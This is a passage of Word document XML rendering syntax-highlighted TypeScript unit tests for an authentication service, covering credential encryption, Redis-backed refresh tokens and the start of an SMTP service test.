      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AuthService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">decryptCredentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ciphertext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">iv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tag</w:t>
      </w:r>
      <w:r>
        <w:br/>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(decrypted)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(plain)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'produce diferentes ciphertexts para la misma entrada (IV aleatorio)'</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plain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'same-password'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> e1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AuthService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">encryptCredentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(plain)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> e2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AuthService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">encryptCredentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(plain)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(e1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ciphertext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(e2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ciphertext</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(e1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">iv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(e2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">iv</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describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'createRefreshToken'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'almacena token en Redis con TTL de 7 días'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redis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'../../config/redis'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ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AuthService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createRefreshToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'user-123'</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(token)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toHaveLength</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// 32 bytes hex = 64 chars</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">setex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toHaveBeenCalledWith</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">stringMatching</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">refresh:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[a-f0-9]{64}$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">604800</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// 7 * 24 * 3600</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">stringContaining</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'"userId":"user-123"'</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describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'validateRefreshToken'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'retorna datos y elimina token (one-time use)'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redis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'../../config/redis'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mockData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userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'user-123'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> family</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'fam-abc'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mockResolvedValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(mockData)</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AuthService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">validateRefreshToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'token-id-456'</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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toEqual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'user-123'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> family</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'fam-abc'</w:t>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(redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">del</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toHaveBeenCalledWith</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'refresh:token-id-456'</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'retorna null para token inexistente'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redis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'../../config/redis'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mockResolvedValue</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AuthService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">validateRefreshToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'nonexistent'</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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeNull</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SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/services/__tests__/smtp.spec.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> beforeEach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 SmtpService } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'../smtp'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nodemailer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'nodemailer'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'nodemailer'</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actual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
